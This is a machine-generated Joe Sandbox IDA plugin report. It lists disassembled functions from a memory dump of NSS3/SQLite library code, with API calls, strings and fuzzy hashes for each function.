Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 69483377791343453f50a422a40ff1d75a073d24d357df0a82c275c8f6458c0e
Instruction ID: 06bd65cab97a0234ba3042b06ba9ec19c3c63b04cc124e03f97cdb7abe35c5de
Opcode Fuzzy Hash: 69483377791343453f50a422a40ff1d75a073d24d357df0a82c275c8f6458c0e
Instruction Fuzzy Hash: 470280B1F055098FDB04CF59C680AAEBBF2FF89308F194179D895AB751D731A841CBA0

Function 6C7669A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C766A02
EnterCriticalSection.KERNEL32(?), ref: 6C766AA6
LeaveCriticalSection.KERNEL32(?), ref: 6C766AF9
sqlite3_free.NSS3(00000000), ref: 6C766B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C766BA6

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C766B9F
winDelete, xrefs: 6C766B71

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1405699761
Opcode ID: b72752291d1f3bbc09be30bb0da1833bdc4b91c0a65cba8ff479a6be8dd7e6b8
Instruction ID: 0c766bb6154d695880383748d44df016294a939d762f60ca0d59a287f7f117d9
Opcode Fuzzy Hash: b72752291d1f3bbc09be30bb0da1833bdc4b91c0a65cba8ff479a6be8dd7e6b8
Instruction Fuzzy Hash: 49512431B001049BEB28AB66DE59ABE3775FF86318B54413DE816C7A80DB349A01CBD2

Function 6C842F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C842FFD
sqlite3_initialize.NSS3 ref: 6C843007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C843032
sqlite3_mprintf.NSS3(6C8AAAF9,?), ref: 6C843073
sqlite3_free.NSS3(?), ref: 6C8430B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C8430C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C8430BB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 44a7acfdd82102bfa5539899616173b9967965a17be317b82edc4a23e690c8fa
Instruction ID: 54ee2b41969ed3d340378489feef394f8c43e29f76ce66326c12ff2797331fc6
Opcode Fuzzy Hash: 44a7acfdd82102bfa5539899616173b9967965a17be317b82edc4a23e690c8fa
Instruction Fuzzy Hash: 2E41C17160060AAFDB20CF25D984A8AB7E5FF44369F14CA28EC2987B40E731F955CBD1

Function 6C788CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C79124D,00000001), ref: 6C788D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C79124D,00000001), ref: 6C788D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788D73
PR_Unlock.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788D8C

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788DBA

Strings

KRAM, xrefs: 6C788CF9
KRAM, xrefs: 6C788D3E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 4c4c65a12a014b0ee354923983b23d46c4bc6f4cfcde25ad69dae1db1eca1482
Instruction ID: 51350dacd2271357fa5deb661e0f4462f43acd3052176adaa4bd8fa00e4adba7
Opcode Fuzzy Hash: 4c4c65a12a014b0ee354923983b23d46c4bc6f4cfcde25ad69dae1db1eca1482
Instruction Fuzzy Hash: 8F21A1B5A056018FCB10EF39C68565AB7F0FF59318F15897ADA88CBB01D730E841CBA1

Function 6C7AACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C7AACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAD23

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C7AAD1C
C_MessageDecryptFinal, xrefs: 6C7AACE1
hSession = 0x%x, xrefs: 6C7AACFE, 6C7AAD0E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: a4d325ad8044793334164e9ee2fe2b33f22a3c4fd2fc4a8b9b603e1ff0567fab
Instruction ID: f3cc91426caa97d8c8f9b51e64ff0b730f02f9ae6590a7cb2cf7df0bc7125c20
Opcode Fuzzy Hash: a4d325ad8044793334164e9ee2fe2b33f22a3c4fd2fc4a8b9b603e1ff0567fab
Instruction Fuzzy Hash: 9A210D71601154AFDB309B98DF8DB6A7375AB4232DF044539E80A97B12DB34BC0ACBD2

Function 6C880ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C880EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C880EFA

Part of subcall function 6C76AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C76AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C880ED9, 6C880EE5, 6C880F06, 6C880F0B
Aborting, xrefs: 6C880EB3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 3b5efcb8b58fd8cb847df5acbc3905236a6dec5fa1f809cdbd1bf790cf498bcc
Instruction ID: d404a3d5549d2bd11ac4f9b64d8def5ad8c1973ce66d26a33ae11939493f2463
Opcode Fuzzy Hash: 3b5efcb8b58fd8cb847df5acbc3905236a6dec5fa1f809cdbd1bf790cf498bcc
Instruction Fuzzy Hash: FF01ADB6901114ABDF21AF68DD898AB3B3CEF46368B004464FD0997B02D731EA50C6E2

Function 6C788B50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C790948,00000000), ref: 6C788B6B
EnterCriticalSection.KERNEL32(?,?,?,6C790948,00000000), ref: 6C788B80
PL_FinishArenaPool.NSS3(?,?,?,?,6C790948,00000000), ref: 6C788B8F
PR_Unlock.NSS3(?,?,?,?,6C790948,00000000), ref: 6C788BA1
DeleteCriticalSection.KERNEL32(?,?,?,?,6C790948,00000000), ref: 6C788BAC
free.MOZGLUE(?,?,?,?,?,6C790948,00000000), ref: 6C788BB8

Strings

Hyl, xrefs: 6C788B59

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID: Hyl
API String ID: 1456478736-3402398605
Opcode ID: e78163216880bbe42791dcbfb158fa85a402e00edfc8be5b891f3526ab903c78
Instruction ID: a43b80f4be5f2e9a75aaded2fbf07e980a87b824459c164d1b90ef904b470331
Opcode Fuzzy Hash: e78163216880bbe42791dcbfb158fa85a402e00edfc8be5b891f3526ab903c78
Instruction Fuzzy Hash: E81188B1604A059FDB10BFB8C28816ABBF4FF41318F01493AD98587A01EB34A599CBD2

Function 6C882B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,.dll), ref: 6C882B81
PR_smprintf.NSS3(%s%s,?,.dll), ref: 6C882B98
PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6C882BB4
PR_smprintf.NSS3(6C8AAAF9,?), ref: 6C882BC4

Strings

%s\%s%s, xrefs: 6C882BAF
.dll, xrefs: 6C882B7B, 6C882BA8, 6C882BCE
%s\%s, xrefs: 6C882B93

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: R_smprintf$strstr
String ID: %s\%s$%s\%s%s$.dll
API String ID: 3360132973-3501675219
Opcode ID: 6d850e9a60391c80a3a368bdfb29a5ddc662192ca2c63eb55f7885a5e6866248
Instruction ID: f43ad5c275f6083659adc868eb2f9321c899feccced63784ec09f3cbd195a392
Opcode Fuzzy Hash: 6d850e9a60391c80a3a368bdfb29a5ddc662192ca2c63eb55f7885a5e6866248
Instruction Fuzzy Hash: B5F08226403415B2853028DA6F0CED73E1DCCD3AA9B544CAABC19B2F05FB16A116D4F2

Function 6C844D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C844DE0

Strings

invalid, xrefs: 6C844DB8
misuse, xrefs: 6C844DD5
API call with %s database connection pointer, xrefs: 6C844DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C844DCB
%s at line %d of [%.10s], xrefs: 6C844DDA

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 366405c5880a391cc33e40904c9a9557b963a0141f5a2221561ec41da87228f6
Instruction ID: 2e5a1d0092559a4bf904b79fbdfe59b4ab1521becc6544a37f294a1f322c7ec1
Opcode Fuzzy Hash: 366405c5880a391cc33e40904c9a9557b963a0141f5a2221561ec41da87228f6
Instruction Fuzzy Hash: 35F02421A04A6C6FD7204455CF15F8633554F8131AF0A4DA0ED047BF52D249A8508380

Function 6C844DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C844E4D

Strings

invalid, xrefs: 6C844E25
misuse, xrefs: 6C844E42
API call with %s database connection pointer, xrefs: 6C844E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C844E38
%s at line %d of [%.10s], xrefs: 6C844E47

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a99b87d89cbc6eef1fe8363a93a5baaf5fc0972c4014f5d0676a6f08e9141de9
Instruction ID: 0d75233fde62582df5dbfbd5692f08ed4bcf8fe69e4d45ac5e392dd7755f49f0
Opcode Fuzzy Hash: a99b87d89cbc6eef1fe8363a93a5baaf5fc0972c4014f5d0676a6f08e9141de9
Instruction Fuzzy Hash: A1F02711E4492C6BE73004659F18FC737864B91339F0DCCA1EE0A77F93D209987152D1

Function 6C7B0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000,?,?), ref: 6C7B0CB3

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C7B0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C7B0DEC

Part of subcall function 6C7D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
Part of subcall function 6C7D0F10: malloc.MOZGLUE(00000001), ref: 6C7D0F30
Part of subcall function 6C7D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000), ref: 6C7B0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000), ref: 6C7B0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0E79

Part of subcall function 6C7C1560: TlsGetValue.KERNEL32(00000000,?,6C790844,?), ref: 6C7C157A
Part of subcall function 6C7C1560: EnterCriticalSection.KERNEL32(?,?,?,6C790844,?), ref: 6C7C158F
Part of subcall function 6C7C1560: PR_Unlock.NSS3(?,?,?,?,6C790844,?), ref: 6C7C15B2

Part of subcall function 6C78B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C791397,00000000,?,6C78CF93,5B5F5EC0,00000000,?,6C791397,?), ref: 6C78B1CB
Part of subcall function 6C78B1A0: free.MOZGLUE(5B5F5EC0,?,6C78CF93,5B5F5EC0,00000000,?,6C791397,?), ref: 6C78B1D2

Part of subcall function 6C7889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7888AE,-00000008), ref: 6C788A04
Part of subcall function 6C7889E0: EnterCriticalSection.KERNEL32(?), ref: 6C788A15
Part of subcall function 6C7889E0: memset.VCRUNTIME140(6C7888AE,00000000,00000132), ref: 6C788A27
Part of subcall function 6C7889E0: PR_Unlock.NSS3(?), ref: 6C788A35

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: f2932aa7cf7e01775f259f4e6fca77d8c7c333ac009c5b749a6762f93fd12958
Instruction ID: f5e38a888ec62fabadb548e156a54d515ec67db1fa1c781819866a716f790658
Opcode Fuzzy Hash: f2932aa7cf7e01775f259f4e6fca77d8c7c333ac009c5b749a6762f93fd12958
Instruction Fuzzy Hash: 1251A7F5D012015FEB10AF64EF89AAB37A8AF05258F150474ED09A7B52F731ED1487A2

Function 6C766E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C766ED8
sqlite3_value_text.NSS3(?,?), ref: 6C766EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C766FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C766FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C766FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C767010
sqlite3_value_blob.NSS3(?,?), ref: 6C76701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C767052

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 423342cbba2911d45c5efebab447c7a6c0fa1cd7ebc8fdb4ca6cbca3c5d766bd
Instruction ID: 5f926acc5c0e6bd3f93e9766d2e95eb6a8579d3a5a14180be9fd3aba554bf6bc
Opcode Fuzzy Hash: 423342cbba2911d45c5efebab447c7a6c0fa1cd7ebc8fdb4ca6cbca3c5d766bd
Instruction Fuzzy Hash: AD61E4B1E142058BDB00CFAACA047EEB7B2AF85308F684175DC54ABF51E7319D05CBA0

Function 6C7BCA30 Relevance: 12.2, APIs: 8, Instructions: 174COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7BCA95
EnterCriticalSection.KERNEL32(00000000), ref: 6C7BCAA9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6C7BC8CF,?,?,?), ref: 6C7BCAE7
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7BCB09
PK11_GetBlockSize.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,6C7BC8CF,?,?,?), ref: 6C7BCB31

Part of subcall function 6C7B1490: PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,6C7BCB40,?,00000000), ref: 6C7B14A1
Part of subcall function 6C7B1490: PORT_ZAlloc_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C7BC8CF,?), ref: 6C7B14C7
Part of subcall function 6C7B1490: memset.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B14E4
Part of subcall function 6C7B1490: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000), ref: 6C7B14F5

PR_Unlock.NSS3(?), ref: 6C7BCB97
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7BCBB2
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C7BC8CF), ref: 6C7BCBE2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

